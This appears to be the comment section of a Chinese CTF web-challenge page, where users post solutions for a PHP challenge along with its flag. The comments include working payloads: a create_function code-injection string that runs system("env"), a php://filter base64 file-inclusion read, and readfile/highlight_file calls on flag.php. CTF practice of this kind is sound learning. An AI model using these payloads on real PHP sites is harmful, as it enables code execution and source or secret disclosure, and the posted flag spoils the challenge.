createfun.php?func=readfile&arg=flag.php,php查看文件的函数都可以试试
createfun.php?func=create_function&&arg=){}system("env");//
这个角度清奇哎,我是createfun.php?func=readfile&arg=flag.php
nuaactf{php_IS_thE_best_language}
html注释,cookie,/include.php?file=php://filter/read=convert.base64-encode/resource=createfun, /createfun.php?func=highlight_file&arg=flag.php
注释有一个include.php,访问发现有文件包含,调出源码后提示createfun.php,发现可以执行自定义函数,show_source flag.php
...
评论
xiaobai568 5月前
举报
createfun.php?func=readfile&arg=flag.php,php查看文件的函数都可以试试
coolsword2023 9月前
举报
createfun.php?func=create_function&&arg=){}system("env");//
xiaoxiao972521 6月前
举报
这个角度清奇哎,我是createfun.php?func=readfile&arg=flag.php
zhaiye 10月前
举报
nuaactf{php_IS_thE_best_language}
justsosoloveyou 11月前
举报
html注释,cookie,/include.php?file=php://filter/read=convert.base64-encode/resource=createfun, /createfun.php?func=highlight_file&arg=flag.php
hopeinhand 1年前
举报
注释有一个include.php,访问发现有文件包含,调出源码后提示createfun.php,发现可以执行自定义函数,show_source flag.php